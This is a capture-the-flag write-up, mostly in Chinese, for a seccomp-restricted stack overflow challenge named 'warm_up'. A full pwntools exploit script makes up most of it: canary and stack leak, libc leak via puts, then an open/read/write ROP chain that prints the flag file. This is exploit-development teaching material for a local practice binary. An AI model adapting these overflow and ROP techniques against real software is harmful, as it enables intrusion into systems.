Seccomp
简单的seccomp题：seccomp 限制了可用的系统调用，拿不到 shell，所以用 open/read/write (orw) 的 ROP 链直接读 flag 文件然后输出即可
1.泄漏Canary
2.泄漏Stack基址
3.通过Gadget写orw
EXP
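from pwn import *
from LibcSearcher import *

context.log_level = 'debug'

# Exploit for the 'warm_up' challenge: a stack overflow behind a canary in a
# binary that reads input twice per run of main().  Because the process is
# seccomp-restricted, the final chain is open/read/write on ./flag rather than
# a shell.  Three stages:
#   1. leak the canary and a stack address by overwriting the canary's low
#      0x00 byte so the program's echo runs past it,
#   2. leak __libc_start_main via puts(GOT) and return to main,
#   3. pivot into an ORW ROP chain that prints the flag.
# All payloads are bytes literals so the script works under both Python 2 and
# Python 3 pwntools (str payloads raise TypeError on Python 3).
p = process('warm_up')
elf = ELF('warm_up')

# --- stage 1: leak canary + stack address -------------------------------------
# 0x17 filler bytes + 'H' + the newline appended by sendline() fill the buffer
# exactly up to the canary; the newline clobbers its low 0x00 byte so the echo
# continues through the canary and the stack value stored after it.
p.sendlineafter(b'warm up!!!', b'U' * 0x17 + b'H')
p.recvuntil(b'H', drop=True)
# The low byte of an x86-64 glibc canary is always 0x00; restore only that byte.
# A blanket replace of every 0x0A in the 8 bytes would corrupt a canary that
# happens to contain 0x0A in one of its higher bytes.
canary = u64(p.recv(8)) & 0xffffffffffffff00
stack = u64(p.recv(6).ljust(8, b'\x00'))
log.success('Canary:\t' + hex(canary))
log.success('Stack:\t' + hex(stack))

# --- stage 2: leak libc -------------------------------------------------------
puts_plt = elf.plt['puts']
start_main_got = elf.got['__libc_start_main']
pop_rdi_ret = 0x400BC3  # pop rdi ; ret   (gadget in the non-PIE binary)
main_addr = 0x400B30    # return here so main() reads input again for stage 3

# Drain the program's output so the next recv() starts at the puts() leak.
p.recvrepeat(0.5)
# 0x18 filler | canary | saved rbp (the leaked stack value is as good as any) |
# pop rdi ; ret | GOT[__libc_start_main] | puts@plt | main
payload_I = b'U' * 0x18 + p64(canary) + p64(stack)
payload_I += p64(pop_rdi_ret) + p64(start_main_got) + p64(puts_plt) + p64(main_addr)
p.sendline(payload_I)
start_main_addr = u64(p.recv(6).ljust(8, b'\x00'))
libc = LibcSearcher('__libc_start_main', start_main_addr)
log.success('Start_Main:\t' + hex(start_main_addr))
libcbase = start_main_addr - libc.dump('__libc_start_main')
# A libc base is page-aligned; anything else means the leak was mis-parsed or
# LibcSearcher picked a libc whose symbol offsets do not match the target.
if libcbase & 0xfff:
    log.error('libc base %#x is not page-aligned: bad leak or wrong libc' % libcbase)

# --- stage 3: ORW chain -------------------------------------------------------
# These gadget offsets are hard-coded for one specific libc build.  They are NOT
# resolved by LibcSearcher, so they must be re-checked (e.g. with ROPgadget)
# against the libc that LibcSearcher actually selected above.
pop_rdi = libcbase + 0x21102  # pop rdi ; ret
pop_rsi = libcbase + 0x202E8  # pop rsi ; ret
pop_rdx = libcbase + 0x01B92  # pop rdx ; ret
# Absolute libc function addresses (not GOT slots).
write_addr = libcbase + libc.dump('write')
open_addr = libcbase + libc.dump('open')
read_addr = libcbase + libc.dump('read')

# open() needs a pointer to the "./flag" string that sits at the start of this
# round's input buffer.  The leaked stack value is 0x20 above that buffer for
# this binary (offset worked out for this challenge; re-derive it if the binary
# or the way main() is re-entered changes).
fake = stack - 0x20
log.success('Fake:\t' + hex(fake))
p.sendlineafter(b'warm up!!!', b'U')
p.recvuntil(b' ?')
# "./flag\0\0" (8) + 0x10 filler = 0x18 bytes up to the canary, then the canary
# and a junk saved-rbp slot (the canary value is reused as filler there).
payload_II = b'./flag\x00\x00' + b'U' * 0x10 + p64(canary) * 2
# open(fake, O_RDONLY, 0)
payload_II += p64(pop_rdi) + p64(fake) + p64(pop_rsi) + p64(0) + p64(pop_rdx) + p64(0) + p64(open_addr)
# read(3, bss + 0x100, 0x100) -- fd 3 assumes only stdin/stdout/stderr are open
# when open() returns; adjust if the target keeps other descriptors open.
payload_II += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(elf.bss() + 0x100) + p64(pop_rdx) + p64(0x100) + p64(read_addr)
# write(1, bss + 0x100, 0x100)
payload_II += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(elf.bss() + 0x100) + p64(pop_rdx) + p64(0x100) + p64(write_addr)
p.sendline(payload_II)
p.interactive()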